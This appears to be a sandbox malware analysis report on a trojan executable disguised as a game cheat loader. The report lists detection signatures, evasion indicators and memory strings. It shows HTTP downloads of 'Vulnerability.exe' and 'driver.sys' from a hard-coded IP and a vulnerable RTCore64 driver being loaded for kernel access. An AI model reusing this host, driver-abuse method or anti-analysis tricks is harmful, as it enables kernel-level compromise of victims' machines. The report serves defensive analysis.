Windows Analysis Report
Iyto7FYCJO.exe

Overview

General Information

Sample name:	Iyto7FYCJO.exe renamed because original name is a hash value
Original sample name:	e12627a292cf6a7d32adb932adbd2b3b.exe
Analysis ID:	1538236
MD5:	e12627a292cf6a7d32adb932adbd2b3b
SHA1:	2f6bf97cd38104937b7f47be38a00f0cea9a6f4a
SHA256:	eeca777e359e475f4bf1d137bd60dc0194e9520c0047a388ef28d383dc04250e
Tags:	64exetrojan
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Accesses win32k, likely to find offsets for exploits

Detected VMProtect packer

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Sample is not signed and drops a device driver

Tries to detect debuggers (CloseHandle check)

Tries to detect virtualization through RDTSC time measurements

Tries to evade analysis by execution special instruction (VM detection)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Iyto7FYCJO.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	ReversingLabs: Detection: 55%
Source: C:\Windows\Vulnerability.exe	ReversingLabs: Detection: 55%
Source: C:\Windows\driver.sys	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: Iyto7FYCJO.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe	Joe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Iyto7FYCJO.exe

Joe Sandbox ML: detected

Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d1808002-5

Exploits

Accesses win32k, likely to find offsets for exploits

Source: C:\Windows\Vulnerability.exe

File opened: C:\Windows\System32\win32k.sys

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2

Source: Iyto7FYCJO.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source:	Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source:	Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Vulnerability.exe

Code function: 5_2_00007FF7738F3B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,

5_2_00007FF7738F3B60

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 19:27:48 GMTETag: "2a00-623978cbb6377"Accept-Ranges: bytesContent-Length: 10752Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 34 f0 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 74 b0 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 172.67.72.57 172.67.72.57

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /driver.sys HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122
Source: unknown	TCP traffic detected without corresponding DNS query: 185.101.104.122

Source: global traffic	HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /driver.sys HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: keyauth.win

Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exeC9?
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/Vulnerability.exev
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sys
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysC:
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.syse
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.101.104.122/driver.sysl
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
